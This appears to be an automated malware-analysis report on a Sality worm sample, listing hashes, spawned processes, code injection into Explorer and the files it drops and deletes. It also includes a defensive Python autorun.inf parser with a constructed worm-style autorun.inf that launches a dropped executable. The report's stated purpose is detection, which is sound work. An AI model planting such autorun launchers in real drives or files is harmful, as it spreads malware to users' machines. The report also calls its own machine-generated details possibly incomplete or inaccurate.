Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Worm, Virus, WormAutorun
The description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: df19badc8d07c6bee18a57e61ea387c2
SHA1: 2b7c6da2e61c98224b23f712beeaf74ba38c0787
SHA256: 3b08960f3416e9adf2f25fc702b4bbff4a716875de20f7035615ce17b717e588
SSDeep: 393216:Jm27XOLzs3pUzZyj2wps8oEmTRoUeBxI:Jm27gzs3pUzMjfGoUe
Size: 13067784 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: YourTemplateFinder
Created at: 2012-12-04 15:55:11
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Worm. A program that replicates primarily over networks or removable drives.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | The worm spreads via removable drives: it copies its executable to every removable drive and writes an "autorun.inf" that points at that copy, so the copy is launched when a user opens the drive in Windows Explorer. This only works where AutoRun for removable media is still enabled; Windows 7, and KB971029 on earlier versions, restrict AutoRun to optical drives. |
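The autorun.inf mechanism described in the table is simple to check for on a drive image or a mounted USB stick. The following Python helper is an added example, not part of the Lavasoft report and not code recovered from this sample: it parses an autorun.inf, keeps only the [autorun] section, and lists every command the AutoRun handler would execute (the open, shellexecute and shell\<verb>\command keys). Any such launch key on removable media is treated as suspicious, since current Windows ignores it there anyway and legitimate software no longer relies on it. The parser is deliberately tolerant of the padding tricks autorun worms use (junk sections, comment lines, mixed-case keys) rather than relying on configparser's strictness. The sample autorun.inf below is constructed; "dropped.exe" is a placeholder name, not a file this sample writes.

```python
import re

# Keys whose value is a command line the AutoRun handler would execute.
LAUNCH_KEYS = ("open", "shellexecute")
# shell\<verb>\command=<cmd> keys, e.g. shell\open\command=...
_SHELL_CMD = re.compile(r"^shell\\[^\\]+\\command$", re.I)
# Extensions a launched target commonly carries; the launch itself is
# decided by the key, so a target without one of these still counts.
EXEC_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js")


def parse_autorun(text):
    """Return {key_lower: value} for the [autorun] section only.

    Tolerates the padding worms add: junk sections, blank lines, ';'
    comments, mixed-case keys and lines without '='.
    """
    values = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if not in_autorun or "=" not in line:
            continue
        key, _, value = line.partition("=")
        values[key.strip().lower()] = value.strip()
    return values


def launch_commands(values):
    """Every command line the section asks Windows to run, in file order."""
    return [v for k, v in values.items() if k in LAUNCH_KEYS or _SHELL_CMD.match(k)]


def analyse(text):
    """Summarise what an autorun.inf would do when the drive is opened."""
    values = parse_autorun(text)
    cmds = launch_commands(values)
    targets = []
    for cmd in cmds:
        parts = cmd.split()
        targets.append(parts[0].strip('"').lower() if parts else "")
    return {
        "launches": cmds,
        "targets": targets,
        "executable_targets": [t for t in targets if t.endswith(EXEC_EXT)],
        # worms set icon= to a stock folder/drive icon so the device looks normal
        "sets_icon": "icon" in values,
        "suspicious": bool(cmds),
    }


# Constructed sample in the style of autorun worms; "dropped.exe" is a
# placeholder, not the name of any file this sample writes.
SAMPLE = r"""
[AutoRun]
;kQx9 padding line, typical filler
oPeN=dropped.exe
ShellExecute=dropped.exe
shell\open\Command=dropped.exe
shell\open\Default=1
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
[Other]
open=ignored.exe
"""

if __name__ == "__main__":
    for k, v in analyse(SAMPLE).items():
        print("%-19s %s" % (k, v))
```

Run it against every autorun.inf found on a mounted drive; a file whose "launches" list is non-empty points at the copy of the worm the drive carries, and the path in "targets" is the file to collect.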
Process activity
The Worm creates the following process(es):
Ge-Force-codedownloader.exe:2504
Ge-Force-codedownloader.exe:2564
regsvr32.exe:2416
Khtmovq.exe:664
%original file name%.exe:1616
mscorsvw.exe:172
Ge-Force-bg.exe:2632
The Worm injects its code into the following process(es):
Explorer.EXE:2032
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Ge-Force-codedownloader.exe:2564 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)
The process Khtmovq.exe:664 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\184[1].js (25 bytes)
%Program Files%\Ge-Force\utils.exe (86583 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (35246 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (415 bytes)
%Program Files%\Ge-Force\Ge-Force.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\288[1].js (551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (1 bytes)
%Program Files%\Ge-Force\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\337[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (3312 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\262[1].js (25 bytes)
%Program Files%\Ge-Force\Ge-Force-codedownloader.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (141808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (784 bytes)
%Program Files%\Ge-Force\Ge-Force-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (5 bytes)
%Program Files%\Ge-Force\Ge-Force-bg.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (410 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB7.tmp (662466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\356[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\350[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (997 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (31281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\91[1].js (86817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (1552 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (14 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\ipgeoapi[1] (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\app_code[1].js (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\desktop.ini (67 bytes)
%Program Files%\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe (7726 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (0 bytes)
The process %original file name%.exe:1616 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0014C62D_Rar\%original file name%.exe (99596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (419460 bytes)
